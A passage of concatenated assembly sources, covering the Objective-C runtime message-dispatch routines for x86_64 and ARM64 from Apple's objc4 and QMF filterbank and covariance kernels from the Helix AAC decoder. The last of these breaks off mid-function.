// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band r11 is the searched class
// r11 is already the class to search
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY __objc_msgSend_uncached
STATIC_ENTRY __objc_msgSend_stret_uncached
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band r11 is the searched class
// r11 is already the class to search
MethodTableLookup %a2, %a3 // r11 = IMP
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY __objc_msgSend_stret_uncached
/********************************************************************
*
* id _objc_msgForward(id self, SEL _cmd,...);
*
* _objc_msgForward and _objc_msgForward_stret are the externally-callable
* functions returned by things like method_getImplementation().
* _objc_msgForward_impcache is the function pointer actually stored in
* method caches.
*
********************************************************************/
STATIC_ENTRY __objc_msgForward_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band condition register is NE for stret, EQ otherwise.
MESSENGER_START
nop
MESSENGER_END_SLOW
jne __objc_msgForward_stret
jmp __objc_msgForward
END_ENTRY __objc_msgForward_impcache
// Tail-call the user-installed forward handler through r11.
ENTRY __objc_msgForward
// Non-stret version
movq __objc_forward_handler(%rip), %r11
jmp *%r11
END_ENTRY __objc_msgForward
ENTRY __objc_msgForward_stret
// Struct-return version
movq __objc_forward_stret_handler(%rip), %r11
jmp *%r11
END_ENTRY __objc_msgForward_stret
// Debug/alias entry points: distinct symbols that simply tail-call
// the corresponding real messenger.
ENTRY _objc_msgSend_debug
jmp _objc_msgSend
END_ENTRY _objc_msgSend_debug
ENTRY _objc_msgSendSuper2_debug
jmp _objc_msgSendSuper2
END_ENTRY _objc_msgSendSuper2_debug
ENTRY _objc_msgSend_stret_debug
jmp _objc_msgSend_stret
END_ENTRY _objc_msgSend_stret_debug
ENTRY _objc_msgSendSuper2_stret_debug
jmp _objc_msgSendSuper2_stret
END_ENTRY _objc_msgSendSuper2_stret_debug
ENTRY _objc_msgSend_fpret_debug
jmp _objc_msgSend_fpret
END_ENTRY _objc_msgSend_fpret_debug
ENTRY _objc_msgSend_fp2ret_debug
jmp _objc_msgSend_fp2ret
END_ENTRY _objc_msgSend_fp2ret_debug
ENTRY _objc_msgSend_noarg
jmp _objc_msgSend
END_ENTRY _objc_msgSend_noarg
// method_invoke: %a2 is a Method; load its IMP, then replace %a2 with
// the Method's SEL before jumping to the IMP.
ENTRY _method_invoke
movq method_imp(%a2), %r11
movq method_name(%a2), %a2
jmp *%r11
END_ENTRY _method_invoke
// Struct-return variant: the Method is in %a3 (%a1 = struct address).
ENTRY _method_invoke_stret
movq method_imp(%a3), %r11
movq method_name(%a3), %a3
jmp *%r11
END_ENTRY _method_invoke_stret
// Ignored methods return the receiver unchanged.
STATIC_ENTRY __objc_ignored_method
movq %a1, %rax
ret
END_ENTRY __objc_ignored_method
// Zero terminator for the __objc_msg_break breakpoint table.
.section __DATA,__objc_msg_break
.quad 0
.quad 0
// Workaround for Skype evil (rdar://19715989)
// Deliberate nop padding so _map_images sits at a fixed distance from
// _hax; the real work is tail-called via _map_2_images.
.text
.align 4
.private_extern _map_images
.private_extern _map_2_images
.private_extern _hax
_hax:
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
_map_images:
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
jmp _map_2_images
#endif
|
opensource-apple/objc4 | 11,080 | runtime/Messengers.subproj/objc-msg-arm64.s | /*
* @APPLE_LICENSE_HEADER_START@
*
* Copyright (c) 2011 Apple Inc. All Rights Reserved.
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this
* file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_LICENSE_HEADER_END@
*/
/********************************************************************
*
* objc-msg-arm64.s - ARM64 code to support objc messaging
*
********************************************************************/
#ifdef __arm64__
#include <arm/arch.h>
.data
// _objc_entryPoints and _objc_exitPoints are used by method dispatch
// caching code to figure out whether any threads are actively
// in the cache for dispatching. The labels surround the asm code
// that do cache lookups. The tables are zero-terminated.
.align 4
.private_extern _objc_entryPoints
_objc_entryPoints:
.quad _cache_getImp
.quad _objc_msgSend
.quad _objc_msgSendSuper
.quad _objc_msgSendSuper2
.quad 0
.private_extern _objc_exitPoints
// Each LExit* label is emitted by END_ENTRY at the end of the
// corresponding entry point's code.
_objc_exitPoints:
.quad LExit_cache_getImp
.quad LExit_objc_msgSend
.quad LExit_objc_msgSendSuper
.quad LExit_objc_msgSendSuper2
.quad 0
/********************************************************************
* List every exit insn from every messenger for debugger use.
* Format:
* (
* 1 word instruction's address
* 1 word type (ENTER or FAST_EXIT or SLOW_EXIT or NIL_EXIT)
* )
* 1 word zero
*
* ENTER is the start of a dispatcher
* FAST_EXIT is method dispatch
* SLOW_EXIT is uncached method lookup
* NIL_EXIT is returning zero from a message sent to nil
* These must match objc-gdb.h.
********************************************************************/
// Breakpoint type tags; values must match objc-gdb.h (see banner above).
#define ENTER 1
#define FAST_EXIT 2
#define SLOW_EXIT 3
#define NIL_EXIT 4
.section __DATA,__objc_msg_break
.globl _gdb_objc_messenger_breakpoints
_gdb_objc_messenger_breakpoints:
// contents populated by the macros below
// Each MESSENGER_* macro drops a numeric local label at the current
// text position and records an (address, type) pair in the
// __objc_msg_break table for debugger use.
.macro MESSENGER_START
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad ENTER
.text
.endmacro
.macro MESSENGER_END_FAST
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad FAST_EXIT
.text
.endmacro
.macro MESSENGER_END_SLOW
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad SLOW_EXIT
.text
.endmacro
.macro MESSENGER_END_NIL
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad NIL_EXIT
.text
.endmacro
/* objc_super parameter to sendSuper */
#define RECEIVER 0
#define CLASS 8
/* Selected field offsets in class structure */
#define SUPERCLASS 8
#define CACHE 16
/* Mask selecting the class-pointer bits of a non-pointer isa */
#define ISA_MASK 0x00000001fffffff8
/* Selected field offsets in method structure */
#define METHOD_NAME 0
#define METHOD_TYPES 8
#define METHOD_IMP 16
/********************************************************************
* ENTRY functionName
* STATIC_ENTRY functionName
* END_ENTRY functionName
* ENTRY defines an exported, 32-byte-aligned entry point;
* STATIC_ENTRY the private_extern equivalent. END_ENTRY emits the
* LExit label used by the exit-point table and unwind records.
********************************************************************/
.macro ENTRY /* name */
.text
.align 5
.globl $0
$0:
.endmacro
.macro STATIC_ENTRY /*name*/
.text
.align 5
.private_extern $0
$0:
.endmacro
.macro END_ENTRY /* name */
LExit$0:
.endmacro
/********************************************************************
*
* CacheLookup NORMAL|GETIMP
*
* Locate the implementation for a selector in a class method cache.
*
* Takes:
* x1 = selector
* x9 = class to be searched
*
* Kills:
* x10,x11,x12, x16,x17
*
* On exit: (found) exits CacheLookup
* with x9 = class, x17 = IMP
* (not found) jumps to LCacheMiss
*
********************************************************************/
#define NORMAL 0
#define GETIMP 1
// CacheHit: x17 holds the IMP. NORMAL mode tail-calls it; GETIMP mode
// hands it to cache_getImp's hit path instead.
.macro CacheHit
MESSENGER_END_FAST
.if $0 == NORMAL
br x17 // call imp
.else
b LGetImpHit
.endif
.endmacro
// CheckMiss: a zero bucket sel (x16) marks an empty slot = cache miss.
.macro CheckMiss
.if $0 == NORMAL // miss if bucket->cls == 0
cbz x16, __objc_msgSend_uncached_impcache
.else
cbz x16, LGetImpMiss
.endif
.endmacro
.macro JumpMiss
.if $0 == NORMAL
b __objc_msgSend_uncached_impcache
.else
b LGetImpMiss
.endif
.endmacro
// CacheLookup: register contract in the banner above. Buckets are
// 16-byte {sel, imp} pairs; scan walks downward from the hashed slot
// and wraps to the top once. The scan loop is cloned so a corrupt
// cache terminates in a miss instead of looping forever.
.macro CacheLookup
// x1 = SEL, x9 = isa
ldp x10, x11, [x9, #CACHE] // x10 = buckets, x11 = occupied|mask
and w12, w1, w11 // x12 = _cmd & mask
add x12, x10, x12, LSL #4 // x12 = buckets + ((_cmd & mask)<<4)
ldp x16, x17, [x12] // {x16, x17} = *bucket
1: cmp x16, x1 // if (bucket->sel != _cmd)
b.ne 2f // scan more
CacheHit $0 // call or return imp
2: // not hit: x12 = not-hit bucket
CheckMiss $0 // miss if bucket->cls == 0
cmp x12, x10 // wrap if bucket == buckets
b.eq 3f
ldp x16, x17, [x12, #-16]! // {x16, x17} = *--bucket
b 1b // loop
3: // wrap: x12 = first bucket, w11 = mask
add x12, x12, w11, UXTW #4 // x12 = buckets+(mask<<4)
// Clone scanning loop to miss instead of hang when cache is corrupt.
// The slow path may detect any corruption and halt later.
ldp x16, x17, [x12] // {x16, x17} = *bucket
1: cmp x16, x1 // if (bucket->sel != _cmd)
b.ne 2f // scan more
CacheHit $0 // call or return imp
2: // not hit: x12 = not-hit bucket
CheckMiss $0 // miss if bucket->cls == 0
cmp x12, x10 // wrap if bucket == buckets
b.eq 3f
ldp x16, x17, [x12, #-16]! // {x16, x17} = *--bucket
b 1b // loop
3: // double wrap
JumpMiss $0
.endmacro
.data
.align 3
.globl _objc_debug_taggedpointer_classes
// Tag -> class table for tagged-pointer receivers: 16 eight-byte
// slots, zero-initialized here (presumably populated by the runtime
// at class registration -- confirm in the C runtime source).
_objc_debug_taggedpointer_classes:
.fill 16, 8, 0
ENTRY _objc_msgSend
MESSENGER_START
cmp x0, #0 // nil check and tagged pointer check
b.le LNilOrTagged // (MSB tagged pointer looks negative)
ldr x13, [x0] // x13 = isa
and x9, x13, #ISA_MASK // x9 = class
LGetIsaDone:
CacheLookup NORMAL // calls imp or objc_msgSend_uncached
LNilOrTagged:
b.eq LReturnZero // nil check
// tagged: the top 4 bits of the pointer index the class table
adrp x10, _objc_debug_taggedpointer_classes@PAGE
add x10, x10, _objc_debug_taggedpointer_classes@PAGEOFF
ubfx x11, x0, #60, #4 // x11 = tag bits [60..63]
ldr x9, [x10, x11, LSL #3] // x9 = taggedpointer_classes[tag]
b LGetIsaDone
LReturnZero:
// nil receiver: zero all possible return registers and return.
// x0 is already zero
mov x1, #0
movi d0, #0
movi d1, #0
movi d2, #0
movi d3, #0
MESSENGER_END_NIL
ret
END_ENTRY _objc_msgSend
// x0 = objc_super* on entry; note: no nil/tagged-pointer check here,
// unlike _objc_msgSend.
ENTRY _objc_msgSendSuper
MESSENGER_START
ldr x9, [x0, #CLASS] // load class to search
ldr x0, [x0, #RECEIVER] // load real receiver
CacheLookup NORMAL // calls imp or objc_msgSend_uncached
END_ENTRY _objc_msgSendSuper
// Like msgSendSuper, but objc_super->class is the current class:
// start the search at its superclass.
ENTRY _objc_msgSendSuper2
MESSENGER_START
ldr x9, [x0, #CLASS]
ldr x9, [x9, #SUPERCLASS] // load class to search
ldr x0, [x0, #RECEIVER] // load real receiver
CacheLookup NORMAL
END_ENTRY _objc_msgSendSuper2
ENTRY _objc_msgSend_noarg
b _objc_msgSend
END_ENTRY _objc_msgSend_noarg
STATIC_ENTRY __objc_msgSend_uncached_impcache
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band x9 is the class to search
// Spills all parameter registers, runs the C slow-path lookup, then
// restores them and tail-calls the resulting IMP.
MESSENGER_START
// push frame
stp fp, lr, [sp, #-16]!
mov fp, sp
MESSENGER_END_SLOW
// save parameter registers: x0..x8, q0..q7
sub sp, sp, #(10*8 + 8*16)
stp q0, q1, [sp, #(0*16)]
stp q2, q3, [sp, #(2*16)]
stp q4, q5, [sp, #(4*16)]
stp q6, q7, [sp, #(6*16)]
stp x0, x1, [sp, #(8*16+0*8)]
stp x2, x3, [sp, #(8*16+2*8)]
stp x4, x5, [sp, #(8*16+4*8)]
stp x6, x7, [sp, #(8*16+6*8)]
str x8, [sp, #(8*16+8*8)]
// receiver and selector already in x0 and x1
mov x2, x9 // third arg: class to search
bl __class_lookupMethodAndLoadCache3
// imp in x0
mov x17, x0 // stash IMP so x0 can be restored
// restore registers and return
ldp q0, q1, [sp, #(0*16)]
ldp q2, q3, [sp, #(2*16)]
ldp q4, q5, [sp, #(4*16)]
ldp q6, q7, [sp, #(6*16)]
ldp x0, x1, [sp, #(8*16+0*8)]
ldp x2, x3, [sp, #(8*16+2*8)]
ldp x4, x5, [sp, #(8*16+4*8)]
ldp x6, x7, [sp, #(8*16+6*8)]
ldr x8, [sp, #(8*16+8*8)]
mov sp, fp
ldp fp, lr, [sp], #16
br x17 // tail-call imp
END_ENTRY __objc_msgSend_uncached_impcache
// Compact unwind records for the hand-written entry points:
// (function, length, encoding, personality, LSDA) per entry.
.section __LD,__compact_unwind,regular,debug
.quad _objc_msgSend
.set LUnwind_objc_msgSend, LExit_objc_msgSend-_objc_msgSend
.long LUnwind_objc_msgSend
.long 0x02000000 // no frame, no SP adjustment
.quad 0 // no personality
.quad 0 // no LSDA
.section __LD,__compact_unwind,regular,debug
.quad _objc_msgSendSuper
.set LUnwind_objc_msgSendSuper, LExit_objc_msgSendSuper-_objc_msgSendSuper
.long LUnwind_objc_msgSendSuper
.long 0x02000000 // no frame, no SP adjustment
.quad 0 // no personality
.quad 0 // no LSDA
.section __LD,__compact_unwind,regular,debug
.quad _objc_msgSendSuper2
.set LUnwind_objc_msgSendSuper2, LExit_objc_msgSendSuper2-_objc_msgSendSuper2
.long LUnwind_objc_msgSendSuper2
.long 0x02000000 // no frame, no SP adjustment
.quad 0 // no personality
.quad 0 // no LSDA
.section __LD,__compact_unwind,regular,debug
.quad __objc_msgSend_uncached_impcache
.set LUnwind__objc_msgSend_uncached_impcache, LExit__objc_msgSend_uncached_impcache-__objc_msgSend_uncached_impcache
.long LUnwind__objc_msgSend_uncached_impcache
.long 0x04000000 // frame, no non-volatile registers saved
.quad 0 // no personality
.quad 0 // no LSDA
// IMP cache_getImp(Class cls, SEL sel): cache-only lookup; returns 0
// on a miss or when the cached entry is the uncached-dispatch stub.
STATIC_ENTRY _cache_getImp
and x9, x0, #ISA_MASK
CacheLookup GETIMP
LGetImpHit:
// imp in x17
// don't return msgSend_uncached
adrp x16, __objc_msgSend_uncached_impcache@PAGE
add x16, x16, __objc_msgSend_uncached_impcache@PAGEOFF
cmp x16, x17
csel x0, x17, xzr, ne // if imp!=uncached then imp else 0
ret
LGetImpMiss:
mov x0, #0
ret
END_ENTRY _cache_getImp
/********************************************************************
*
* id _objc_msgForward(id self, SEL _cmd,...);
*
* _objc_msgForward is the externally-callable
* function returned by things like method_getImplementation().
* _objc_msgForward_impcache is the function pointer actually stored in
* method caches.
*
********************************************************************/
STATIC_ENTRY __objc_msgForward_impcache
MESSENGER_START
nop
MESSENGER_END_SLOW
// No stret specialization.
b __objc_msgForward
END_ENTRY __objc_msgForward_impcache
// Tail-call the user-installed forward handler through x17.
ENTRY __objc_msgForward
adrp x17, __objc_forward_handler@PAGE
ldr x17, [x17, __objc_forward_handler@PAGEOFF]
br x17
END_ENTRY __objc_msgForward
// Debug entry points: aliases that tail-call the real messengers.
ENTRY _objc_msgSend_debug
b _objc_msgSend
END_ENTRY _objc_msgSend_debug
ENTRY _objc_msgSendSuper2_debug
b _objc_msgSendSuper2
END_ENTRY _objc_msgSendSuper2_debug
ENTRY _method_invoke
// x1 is method triplet instead of SEL
ldr x17, [x1, #METHOD_IMP]
ldr x1, [x1, #METHOD_NAME] // replace x1 with the Method's SEL
br x17
END_ENTRY _method_invoke
// Ignored methods return the receiver unchanged.
STATIC_ENTRY __objc_ignored_method
// self is already in x0
ret
END_ENTRY __objc_ignored_method
#endif
|
open-vela/external_libhelix-aac | 4,340 | sbrqmfsk.s | @ ***** BEGIN LICENSE BLOCK *****
@ Source last modified: $Id: sbrqmfsk.s,v 1.1 2005/04/08 21:59:46 jrecker Exp $
@
@ Portions Copyright (c) 1995-2005 RealNetworks, Inc. All Rights Reserved.
@
@ The contents of this file, and the files included with this file,
@ are subject to the current version of the RealNetworks Public
@ Source License (the "RPSL") available at
@ http://www.helixcommunity.org/content/rpsl unless you have licensed
@ the file under the current version of the RealNetworks Community
@ Source License (the "RCSL") available at
@ http://www.helixcommunity.org/content/rcsl, in which case the RCSL
@ will apply. You may also obtain the license terms directly from
@ RealNetworks. You may not use this file except in compliance with
@ the RPSL or, if you have a valid RCSL with RealNetworks applicable
@ to this file, the RCSL. Please see the applicable RPSL or RCSL for
@ the rights, obligations and limitations governing use of the
@ contents of the file.
@
@ This file is part of the Helix DNA Technology. RealNetworks is the
@ developer and/or licensor of the Original Code and owns the
@ copyrights in the portions it created.
@
@ This file, and the files included with this file, is distributed
@ and made available on an 'AS IS' basis, WITHOUT WARRANTY OF ANY
@ KIND, EITHER EXPRESS OR IMPLIED, AND REALNETWORKS HEREBY DISCLAIMS
@ ALL SUCH WARRANTIES, INCLUDING WITHOUT LIMITATION, ANY WARRANTIES
@ OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, QUIET
@ ENJOYMENT OR NON-INFRINGEMENT.
@
@ Technology Compatibility Kit Test Suite(s) Location:
@ http://www.helixcommunity.org/content/tck
@
@ Contributor(s):
@
@ ***** END LICENSE BLOCK *****
.syntax unified
.thumb
.thumb_func
.align 2
@ void QMFSynthesisConv(int *cPtr, int *delay, int dIdx, short *outbuf, int nChans);
@ see comments in sbrqmf.c
@
@ Register use:
@ r0 = cPtr (coefficients, read forward) r1 = delay (1280-int ring)
@ r5/r6 = dOff0/dOff1 delay offsets, stepped by -256 mod 1280
@ r7:r8 = 64-bit MAC accumulator r3 = outbuf, r9 = nChans (5th arg)
@ Produces 64 interleaved 16-bit samples per call.
@ NOTE(review): conditional forms (addlt/eorne) appear outside IT
@ blocks under `.syntax unified`/.thumb; this assumes assembly with
@ implicit-IT enabled (e.g. -Wa,-mimplicit-it=always) -- confirm flags.
.global raac_QMFSynthesisConv
raac_QMFSynthesisConv:
stmfd sp!, {r4-r11, r14}
ldr r9, [r13, #4*9] @ we saved 9 registers on stack
mov r5, r2, lsl #7 @ dOff0 = 128*dIdx
subs r6, r5, #1 @ dOff1 = dOff0 - 1
addlt r6, r6, #1280 @ if (dOff1 < 0) then dOff1 += 1280
mov r4, #64 @ 64 output samples
SRC_Loop_Start:
@ 5 unrolled pairs: acc += c[i]*delay[dOff0] + c[i+1]*delay[dOff1],
@ each offset stepping down by 256 with wrap at 0 (mod 1280)
ldr r10, [r0], #4
ldr r12, [r0], #4
ldr r11, [r1, r5, lsl #2]
ldr r14, [r1, r6, lsl #2]
smull r7, r8, r10, r11
subs r5, r5, #256
addlt r5, r5, #1280
smlal r7, r8, r12, r14
subs r6, r6, #256
addlt r6, r6, #1280
ldr r10, [r0], #4
ldr r12, [r0], #4
ldr r11, [r1, r5, lsl #2]
ldr r14, [r1, r6, lsl #2]
smlal r7, r8, r10, r11
subs r5, r5, #256
addlt r5, r5, #1280
smlal r7, r8, r12, r14
subs r6, r6, #256
addlt r6, r6, #1280
ldr r10, [r0], #4
ldr r12, [r0], #4
ldr r11, [r1, r5, lsl #2]
ldr r14, [r1, r6, lsl #2]
smlal r7, r8, r10, r11
subs r5, r5, #256
addlt r5, r5, #1280
smlal r7, r8, r12, r14
subs r6, r6, #256
addlt r6, r6, #1280
ldr r10, [r0], #4
ldr r12, [r0], #4
ldr r11, [r1, r5, lsl #2]
ldr r14, [r1, r6, lsl #2]
smlal r7, r8, r10, r11
subs r5, r5, #256
addlt r5, r5, #1280
smlal r7, r8, r12, r14
subs r6, r6, #256
addlt r6, r6, #1280
ldr r10, [r0], #4
ldr r12, [r0], #4
ldr r11, [r1, r5, lsl #2]
ldr r14, [r1, r6, lsl #2]
smlal r7, r8, r10, r11
subs r5, r5, #256
addlt r5, r5, #1280
smlal r7, r8, r12, r14
subs r6, r6, #256
addlt r6, r6, #1280
add r5, r5, #1
sub r6, r6, #1 @ advance offsets for the next output sample
add r8, r8, #0x04 @ round before the >>3 below
mov r8, r8, asr #3 @ FBITS_OUT_QMFS
mov r7, r8, asr #31 @ r7 = sign (0 or -1)
cmp r7, r8, asr #15 @ result fits in 16 bits?
eorne r8, r7, #0x7f00 @ takes 2 instructions for immediate value of 0x7fffffff
eorne r8, r8, #0x00ff @ saturate: sign ^ 0x7fff (low 16 bits stored)
strh r8, [r3, #0]
add r3, r3, r9, lsl #1 @ outbuf += nChans (interleaved channels)
subs r4, r4, #1
bne SRC_Loop_Start
ldmfd sp!, {r4-r11, pc}
.end
|
open-vela/external_libhelix-aac | 5,719 | sbrqmfak.s | @ ***** BEGIN LICENSE BLOCK *****
@ Source last modified: $Id: sbrqmfak.s,v 1.1 2005/04/08 21:59:46 jrecker Exp $
@
@ Portions Copyright (c) 1995-2005 RealNetworks, Inc. All Rights Reserved.
@
@ The contents of this file, and the files included with this file,
@ are subject to the current version of the RealNetworks Public
@ Source License (the "RPSL") available at
@ http://www.helixcommunity.org/content/rpsl unless you have licensed
@ the file under the current version of the RealNetworks Community
@ Source License (the "RCSL") available at
@ http://www.helixcommunity.org/content/rcsl, in which case the RCSL
@ will apply. You may also obtain the license terms directly from
@ RealNetworks. You may not use this file except in compliance with
@ the RPSL or, if you have a valid RCSL with RealNetworks applicable
@ to this file, the RCSL. Please see the applicable RPSL or RCSL for
@ the rights, obligations and limitations governing use of the
@ contents of the file.
@
@ This file is part of the Helix DNA Technology. RealNetworks is the
@ developer and/or licensor of the Original Code and owns the
@ copyrights in the portions it created.
@
@ This file, and the files included with this file, is distributed
@ and made available on an 'AS IS' basis, WITHOUT WARRANTY OF ANY
@ KIND, EITHER EXPRESS OR IMPLIED, AND REALNETWORKS HEREBY DISCLAIMS
@ ALL SUCH WARRANTIES, INCLUDING WITHOUT LIMITATION, ANY WARRANTIES
@ OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, QUIET
@ ENJOYMENT OR NON-INFRINGEMENT.
@
@ Technology Compatibility Kit Test Suite(s) Location:
@ http://www.helixcommunity.org/content/tck
@
@ Contributor(s):
@
@ ***** END LICENSE BLOCK *****
.syntax unified
.thumb
.thumb_func
.align 2
@void QMFAnalysisConv(int *cTab, int *delay, int dIdx, int *uBuf)
@ see comments in sbrqmf.c
@
@ Register use:
@ r0 = cTab read forward, r4 = cTab+164 read backward
@ r1 = delay (320-int ring), r6 = delay offset, stepped -32 mod 320
@ r7:r8 and r9:r10 = two 64-bit MAC accumulators per output pair
@ r3 = uBuf; each pass stores uBuf[i] and uBuf[i+32]
@ First pass is special-cased to negate two backward coefficients.
@ NOTE(review): conditional forms (addlt) appear outside IT blocks
@ under `.syntax unified`/.thumb; assumes implicit-IT assembly flags.
.global raac_QMFAnalysisConv
raac_QMFAnalysisConv:
stmfd sp!, {r4-r11, r14}
mov r6, r2, lsl #5 @ dOff0 = 32*dIdx
add r6, r6, #31 @ dOff0 = 32*dIdx + 31
add r4, r0, #4*(164) @ cPtr1 = cPtr0 + 164
@ special first pass (flip sign for cTab[384], cTab[512])
ldr r11, [r0], #4
ldr r14, [r0], #4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smull r7, r8, r11, r12
smull r9, r10, r14, r2
ldr r11, [r0], #4
ldr r14, [r0], #4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
ldr r11, [r0], #4
ldr r14, [r4], #-4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
ldr r11, [r4], #-4
ldr r14, [r4], #-4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
rsb r11, r11, #0 @ negate this coefficient (first pass only)
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
ldr r11, [r4], #-4
ldr r14, [r4], #-4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
rsb r11, r11, #0 @ negate this coefficient (first pass only)
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
str r10, [r3, #4*32] @ uBuf[32]: high word of second accumulator
str r8, [r3], #4 @ uBuf[0], advance uBuf
sub r6, r6, #1
mov r5, #31 @ 31 remaining passes
SRC_Loop_Start:
ldr r11, [r0], #4
ldr r14, [r0], #4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smull r7, r8, r11, r12
smull r9, r10, r14, r2
ldr r11, [r0], #4
ldr r14, [r0], #4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
ldr r11, [r0], #4
ldr r14, [r4], #-4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
ldr r11, [r4], #-4
ldr r14, [r4], #-4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
ldr r11, [r4], #-4
ldr r14, [r4], #-4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
str r10, [r3, #4*32]
str r8, [r3], #4
sub r6, r6, #1
subs r5, r5, #1
bne SRC_Loop_Start
ldmfd sp!, {r4-r11, pc}
.end
|
open-vela/external_libhelix-aac | 4,760 | sbrcov.s | @ ***** BEGIN LICENSE BLOCK *****
@ Source last modified: $Id: sbrcov.s,v 1.1 2005/04/08 21:59:46 jrecker Exp $
@
@ Portions Copyright (c) 1995-2005 RealNetworks, Inc. All Rights Reserved.
@
@ The contents of this file, and the files included with this file,
@ are subject to the current version of the RealNetworks Public
@ Source License (the "RPSL") available at
@ http://www.helixcommunity.org/content/rpsl unless you have licensed
@ the file under the current version of the RealNetworks Community
@ Source License (the "RCSL") available at
@ http://www.helixcommunity.org/content/rcsl, in which case the RCSL
@ will apply. You may also obtain the license terms directly from
@ RealNetworks. You may not use this file except in compliance with
@ the RPSL or, if you have a valid RCSL with RealNetworks applicable
@ to this file, the RCSL. Please see the applicable RPSL or RCSL for
@ the rights, obligations and limitations governing use of the
@ contents of the file.
@
@ This file is part of the Helix DNA Technology. RealNetworks is the
@ developer and/or licensor of the Original Code and owns the
@ copyrights in the portions it created.
@
@ This file, and the files included with this file, is distributed
@ and made available on an 'AS IS' basis, WITHOUT WARRANTY OF ANY
@ KIND, EITHER EXPRESS OR IMPLIED, AND REALNETWORKS HEREBY DISCLAIMS
@ ALL SUCH WARRANTIES, INCLUDING WITHOUT LIMITATION, ANY WARRANTIES
@ OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, QUIET
@ ENJOYMENT OR NON-INFRINGEMENT.
@
@ Technology Compatibility Kit Test Suite(s) Location:
@ http://www.helixcommunity.org/content/tck
@
@ Contributor(s):
@
@ ***** END LICENSE BLOCK *****
.syntax unified
.thumb
.thumb_func
.align 2
@ void CVKernel1(int *XBuf, int *accBuf)
@ see comments in sbrhfgen.c
@
@ Register use:
@ r0 = XBuf; each sample n has a real part at XBuf[n] and a second
@ component one row later, at byte offset 4*(2*64-1) from the
@ post-incremented pointer (r14 is rebuilt as that address).
@ r3:r4 = sample n-1 pair, r5:r6 = sample n pair
@ r7:r8, r9:r10, r11:r12 = three 64-bit covariance accumulators
@ r1 = accBuf: slots [0..5] and [6..11] receive the two partial sums.
@ NOTE(review): conditional forms assume implicit-IT assembly flags.
.global raac_CVKernel1
raac_CVKernel1:
stmfd sp!, {r4-r11, r14}
ldr r3, [r0], #4*(1)
mov r14, #4*(2*64-1)
add r14, r0, r14 @ r14 -> second component of sample 0
ldr r4, [r14]
ldr r5, [r0], #4*(1)
@ BUGFIX: r0 advanced by 4 since r14 was formed, so sample 1's second
@ component lives at r14+4. The previous `ldr r6, [r14]` re-read the
@ same word as r4 (the loop below rebuilds r14 after the increment,
@ which is the pattern this must match).
ldr r6, [r14, #4]
rsb r14, r4, #0
smull r7, r8, r5, r3
smlal r7, r8, r6, r4
smull r9, r10, r3, r6
smlal r9, r10, r14, r5
smull r11, r12, r3, r3
smlal r11, r12, r4, r4
add r2, r1, #(4*6)
stmia r2, {r7-r12} @ stash first-sample products in accBuf[6..11]
mov r7, #0
mov r8, #0
